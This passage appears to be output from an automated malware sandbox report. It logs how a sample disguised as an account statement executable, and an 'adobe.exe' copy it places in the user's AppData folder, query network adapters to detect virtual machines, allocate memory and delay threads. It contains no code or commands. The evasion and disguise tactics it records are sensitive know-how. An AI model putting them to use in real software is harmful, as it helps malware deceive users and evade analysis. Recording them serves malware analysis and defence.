                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: 3320000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: 5320000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeMemory allocated: 4B20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory allocated: 4990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599419Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 599092Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597660Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596546Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596327Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596219Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 596000Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595891Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595641Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595310Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594648Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594531Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594422Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594203Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 594092Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exeThread delayed: delay time: 593860Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598338Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597778Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597323Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596654Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595999Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595388Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595274Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595130Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594341Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599889Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
